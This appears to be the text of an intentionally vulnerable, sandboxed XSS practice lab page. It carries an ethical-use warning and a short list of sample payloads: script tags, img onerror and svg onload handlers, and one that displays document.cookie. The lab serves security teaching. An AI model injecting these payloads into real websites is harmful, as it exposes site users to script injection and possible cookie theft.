๐จ Warning: This site is for educational use only. Do not use XSS techniques on real websites without permission. Ethical hacking only.
โ ๏ธ You are now viewing a sandboxed, intentionally vulnerable XSS lab. Return to SudoHopeX.github.io if you arrived here by mistake.
Type your HTML/JS payload below. It will be injected into a sandboxed iframe.
<script>alert('XSS')</script>
<img src=x onerror="alert('XSS')">
<svg onload="alert('XSS')">
<script>prompt('What is your name?')</script>
<script>console.log('XSS in console')</script>
<script>alert(document.cookie)</script>